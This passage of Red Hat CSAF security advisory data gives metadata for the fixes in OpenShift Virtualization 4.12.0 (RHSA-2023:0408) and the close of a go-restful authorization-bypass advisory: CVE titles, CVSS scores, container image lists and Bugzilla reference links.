"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6351"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "go-restful: Authorization Bypass Through User-Controlled Key"
}
]
}
rhsa-2023_0408
Vulnerability from csaf_redhat
Published
2023-01-25 11:11
Modified
2024-11-25 13:35
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
* golang: syscall: faccessat checks wrong group (CVE-2022-29526)
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
==============
bridge-marker-container-v4.12.0-24
cluster-network-addons-operator-container-v4.12.0-24
cnv-containernetworking-plugins-container-v4.12.0-24
cnv-must-gather-container-v4.12.0-58
hco-bundle-registry-container-v4.12.0-769
hostpath-csi-driver-container-v4.12.0-30
hostpath-provisioner-container-v4.12.0-30
hostpath-provisioner-operator-container-v4.12.0-31
hyperconverged-cluster-operator-container-v4.12.0-96
hyperconverged-cluster-webhook-container-v4.12.0-96
kubemacpool-container-v4.12.0-24
kubevirt-console-plugin-container-v4.12.0-182
kubevirt-ssp-operator-container-v4.12.0-64
kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55
kubevirt-tekton-tasks-copy-template-container-v4.12.0-55
kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55
kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55
kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55
kubevirt-tekton-tasks-operator-container-v4.12.0-40
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55
kubevirt-template-validator-container-v4.12.0-32
libguestfs-tools-container-v4.12.0-255
ovs-cni-marker-container-v4.12.0-24
ovs-cni-plugin-container-v4.12.0-24
virt-api-container-v4.12.0-255
virt-artifacts-server-container-v4.12.0-255
virt-cdi-apiserver-container-v4.12.0-72
virt-cdi-cloner-container-v4.12.0-72
virt-cdi-controller-container-v4.12.0-72
virt-cdi-importer-container-v4.12.0-72
virt-cdi-operator-container-v4.12.0-72
virt-cdi-uploadproxy-container-v4.12.0-71
virt-cdi-uploadserver-container-v4.12.0-72
virt-controller-container-v4.12.0-255
virt-exportproxy-container-v4.12.0-255
virt-exportserver-container-v4.12.0-255
virt-handler-container-v4.12.0-255
virt-launcher-container-v4.12.0-255
virt-operator-container-v4.12.0-255
virtio-win-container-v4.12.0-10
vm-network-latency-checkup-container-v4.12.0-89
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenShift Virtualization is Red Hat\u0027s virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nRHEL-8-CNV-4.12\n\n==============\n\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:0408",
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "1719190",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1719190"
},
{
"category": "external",
"summary": "2023393",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2023393"
},
{
"category": "external",
"summary": "2030801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801"
},
{
"category": "external",
"summary": "2030806",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806"
},
{
"category": "external",
"summary": "2040377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2040377"
},
{
"category": "external",
"summary": "2046298",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2046298"
},
{
"category": "external",
"summary": "2052556",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052556"
},
{
"category": "external",
"summary": "2053429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429"
},
{
"category": "external",
"summary": "2053532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532"
},
{
"category": "external",
"summary": "2053541",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541"
},
{
"category": "external",
"summary": "2060499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060499"
},
{
"category": "external",
"summary": "2069098",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069098"
},
{
"category": "external",
"summary": "2070366",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070366"
},
{
"category": "external",
"summary": "2071491",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071491"
},
{
"category": "external",
"summary": "2072797",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2072797"
},
{
"category": "external",
"summary": "2072821",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2072821"
},
{
"category": "external",
"summary": "2079916",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079916"
},
{
"category": "external",
"summary": "2084085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084085"
},
{
"category": "external",
"summary": "2086285",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086285"
},
{
"category": "external",
"summary": "2086551",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086551"
},
{
"category": "external",
"summary": "2087724",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087724"
},
{
"category": "external",
"summary": "2088129",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088129"
},
{
"category": "external",
"summary": "2088464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088464"
},
{
"category": "external",
"summary": "2089391",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089391"
},
{
"category": "external",
"summary": "2089744",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089744"
},
{
"category": "external",
"summary": "2089751",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089751"
},
{
"category": "external",
"summary": "2089804",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089804"
},
{
"category": "external",
"summary": "2091856",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091856"
},
{
"category": "external",
"summary": "2092793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092793"
},
{
"category": "external",
"summary": "2092796",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092796"
},
{
"category": "external",
"summary": "2093771",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093771"
},
{
"category": "external",
"summary": "2093996",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093996"
},
{
"category": "external",
"summary": "2094202",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094202"
},
{
"category": "external",
"summary": "2096285",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096285"
},
{
"category": "external",
"summary": "2096780",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096780"
},
{
"category": "external",
"summary": "2097436",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097436"
},
{
"category": "external",
"summary": "2097586",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097586"
},
{
"category": "external",
"summary": "2099556",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099556"
},
{
"category": "external",
"summary": "2099573",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099573"
},
{
"category": "external",
"summary": "2099923",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099923"
},
{
"category": "external",
"summary": "2100290",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100290"
},
{
"category": "external",
"summary": "2100436",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100436"
},
{
"category": "external",
"summary": "2100442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100442"
},
{
"category": "external",
"summary": "2100495",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495"
},
{
"category": "external",
"summary": "2100629",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100629"
},
{
"category": "external",
"summary": "2100679",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100679"
},
{
"category": "external",
"summary": "2100682",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100682"
},
{
"category": "external",
"summary": "2100684",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100684"
},
{
"category": "external",
"summary": "2101144",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101144"
},
{
"category": "external",
"summary": "2101164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101164"
},
{
"category": "external",
"summary": "2101167",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101167"
},
{
"category": "external",
"summary": "2101333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101333"
},
{
"category": "external",
"summary": "2101335",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101335"
},
{
"category": "external",
"summary": "2101390",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101390"
},
{
"category": "external",
"summary": "2101394",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101394"
},
{
"category": "external",
"summary": "2101423",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101423"
},
{
"category": "external",
"summary": "2101430",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101430"
},
{
"category": "external",
"summary": "2101445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101445"
},
{
"category": "external",
"summary": "2101454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101454"
},
{
"category": "external",
"summary": "2101499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101499"
},
{
"category": "external",
"summary": "2101501",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101501"
},
{
"category": "external",
"summary": "2101628",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101628"
},
{
"category": "external",
"summary": "2101667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101667"
},
{
"category": "external",
"summary": "2101681",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101681"
},
{
"category": "external",
"summary": "2102074",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102074"
},
{
"category": "external",
"summary": "2102125",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102125"
},
{
"category": "external",
"summary": "2102132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102132"
},
{
"category": "external",
"summary": "2102138",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102138"
},
{
"category": "external",
"summary": "2102256",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102256"
},
{
"category": "external",
"summary": "2102448",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102448"
},
{
"category": "external",
"summary": "2102475",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102475"
},
{
"category": "external",
"summary": "2102561",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102561"
},
{
"category": "external",
"summary": "2102737",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102737"
},
{
"category": "external",
"summary": "2102740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102740"
},
{
"category": "external",
"summary": "2103806",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103806"
},
{
"category": "external",
"summary": "2103807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103807"
},
{
"category": "external",
"summary": "2103817",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103817"
},
{
"category": "external",
"summary": "2103844",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103844"
},
{
"category": "external",
"summary": "2104331",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104331"
},
{
"category": "external",
"summary": "2104402",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104402"
},
{
"category": "external",
"summary": "2104422",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104422"
},
{
"category": "external",
"summary": "2104424",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104424"
},
{
"category": "external",
"summary": "2104479",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104479"
},
{
"category": "external",
"summary": "2104480",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104480"
},
{
"category": "external",
"summary": "2104785",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104785"
},
{
"category": "external",
"summary": "2104859",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104859"
},
{
"category": "external",
"summary": "2105257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105257"
},
{
"category": "external",
"summary": "2106175",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106175"
},
{
"category": "external",
"summary": "2106963",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106963"
},
{
"category": "external",
"summary": "2107279",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107279"
},
{
"category": "external",
"summary": "2107342",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342"
},
{
"category": "external",
"summary": "2107371",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371"
},
{
"category": "external",
"summary": "2107374",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374"
},
{
"category": "external",
"summary": "2107376",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376"
},
{
"category": "external",
"summary": "2107383",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383"
},
{
"category": "external",
"summary": "2107386",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386"
},
{
"category": "external",
"summary": "2107388",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388"
},
{
"category": "external",
"summary": "2107390",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390"
},
{
"category": "external",
"summary": "2107392",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392"
},
{
"category": "external",
"summary": "2108339",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2108339"
},
{
"category": "external",
"summary": "2108638",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2108638"
},
{
"category": "external",
"summary": "2109818",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2109818"
},
{
"category": "external",
"summary": "2109975",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2109975"
},
{
"category": "external",
"summary": "2110256",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110256"
},
{
"category": "external",
"summary": "2110562",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110562"
},
{
"category": "external",
"summary": "2111240",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111240"
},
{
"category": "external",
"summary": "2111292",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111292"
},
{
"category": "external",
"summary": "2111328",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111328"
},
{
"category": "external",
"summary": "2111378",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111378"
},
{
"category": "external",
"summary": "2111744",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111744"
},
{
"category": "external",
"summary": "2111794",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111794"
},
{
"category": "external",
"summary": "2112900",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2112900"
},
{
"category": "external",
"summary": "2114516",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2114516"
},
{
"category": "external",
"summary": "2114636",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2114636"
},
{
"category": "external",
"summary": "2114683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2114683"
},
{
"category": "external",
"summary": "2115257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115257"
},
{
"category": "external",
"summary": "2115258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115258"
},
{
"category": "external",
"summary": "2115280",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115280"
},
{
"category": "external",
"summary": "2115769",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115769"
},
{
"category": "external",
"summary": "2116225",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2116225"
},
{
"category": "external",
"summary": "2116644",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2116644"
},
{
"category": "external",
"summary": "2117549",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117549"
},
{
"category": "external",
"summary": "2117803",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117803"
},
{
"category": "external",
"summary": "2117813",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117813"
},
{
"category": "external",
"summary": "2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "2118257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118257"
},
{
"category": "external",
"summary": "2118823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118823"
},
{
"category": "external",
"summary": "2119069",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119069"
},
{
"category": "external",
"summary": "2119128",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119128"
},
{
"category": "external",
"summary": "2119309",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119309"
},
{
"category": "external",
"summary": "2119615",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119615"
},
{
"category": "external",
"summary": "2120907",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120907"
},
{
"category": "external",
"summary": "2121320",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2121320"
},
{
"category": "external",
"summary": "2122236",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2122236"
},
{
"category": "external",
"summary": "2122990",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2122990"
},
{
"category": "external",
"summary": "2124147",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124147"
},
{
"category": "external",
"summary": "2124307",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124307"
},
{
"category": "external",
"summary": "2124528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124528"
},
{
"category": "external",
"summary": "2124555",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124555"
},
{
"category": "external",
"summary": "2124557",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124557"
},
{
"category": "external",
"summary": "2124558",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124558"
},
{
"category": "external",
"summary": "2124565",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124565"
},
{
"category": "external",
"summary": "2124572",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124572"
},
{
"category": "external",
"summary": "2124582",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124582"
},
{
"category": "external",
"summary": "2124594",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124594"
},
{
"category": "external",
"summary": "2124597",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124597"
},
{
"category": "external",
"summary": "2126104",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2126104"
},
{
"category": "external",
"summary": "2126397",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2126397"
},
{
"category": "external",
"summary": "2127787",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127787"
},
{
"category": "external",
"summary": "2127843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127843"
},
{
"category": "external",
"summary": "2127931",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127931"
},
{
"category": "external",
"summary": "2127947",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127947"
},
{
"category": "external",
"summary": "2128002",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128002"
},
{
"category": "external",
"summary": "2128107",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128107"
},
{
"category": "external",
"summary": "2128872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128872"
},
{
"category": "external",
"summary": "2128948",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128948"
},
{
"category": "external",
"summary": "2128949",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128949"
},
{
"category": "external",
"summary": "2128997",
